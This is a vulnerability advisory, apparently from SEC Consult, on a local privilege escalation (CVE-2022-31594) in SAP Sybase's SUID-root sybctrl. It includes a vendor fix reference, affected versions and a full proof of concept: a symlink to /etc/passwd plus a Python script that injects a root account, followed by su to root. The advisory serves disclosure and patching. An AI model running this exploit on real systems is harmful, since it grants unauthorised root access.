Local privilege escalation in SAP® Sybase sybctrl

Vendor description

"Sybase solutions strategic for data management Combining the strength of in-memory technology with Sybase solutions, SAP® offers the most robust data platform to achieve business agility."

Source: https://www.sap.com/germany/acquired-brands/what-is-sybase.html

Business recommendation

SEC Consult recommends to implement the security note 3155571, where the documented issue is fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secure.

Vulnerability overview/description

1) Local privilege escalation (CVE-2022-31594)

The SUID-root program sybctrl by SAP® Sybase follows the symbolic link to log error messages during the execution. As member of the group sapsys, a user can therefore escalate his/her privileges to root on a local Unix system.

Proof of Concept

1) Local privilege escalation (CVE-2022-31594)

As shown below is the owner, group and its permission bits of sybctrl of a standard installation.

$ ls -l sybctrl
-rwsr-x--- 1 root sapsys 4460399 Feb 28  2019 sybctrl

A sapsys group user first creates a symbolic link pointing to the passwd file.

$ ln -s /etc/passwd dev_sybctrl
$ ls -l dev_sybctrl
lrwxrwxrwx 1 secadm sapsys 11 Feb 18 15:30 dev_sybctrl -> /etc/passwd

Then run the following python script, which outputs the error messages into the target file pointed to by the dev_sybctrl. The command line to execute includes one line of user account information surrounded by the new line, and the password hash has been pre-calculated with openssl.

$ cat sol.py
import os
# openssl passwd sappass
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/bash"
os.execv("/usr/sap/SEC/SYS/exe/uc/linuxx86_64/sybctrl", ["sybctrl", "load_script", "cccc", "\x0a" + u1_passwd +  "\x0a", "-auth"])

$ python3 sol.py 
Error: executing administration task failed.

As a result, the /etc/passwd was appended with the error messages, among them the second last line grants a valid privileged account, while others are simply ignored for the purpose of the exploit.

$ tail -n 5 /etc/passwd
2022 02/18 15:30:33 == file opened ==
 DBSL patch version 400.
 Error: invalid argument: 
sapmatt:wPi023oIkjHdA:0:0::/root:/bin/bash
.

A login with the credential sapmatt/sappass ensues to complete the escalation.

$ su sapmatt
Password:
# id
uid=0(sapmatt) gid=0(root) groups=0(root)

Vulnerable / tested versions

The following version of the binary was found to be vulnerable during our tests:

• version 021 (753 03/23/2018 14:04:00)

According to the vendor the following products are affected by the discovered vulnerability:

SAP® Adaptive Server Enterprise (ASE), Versions:

• KERNEL 7.22, 7.49, 7.53
• KRNL64NUC 7.22, 7.22EXT, 7.49
• KRNL64UC 7.22, 7.22EXT, 7.49, 7.53

Please refer to the vendor patch day post: https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline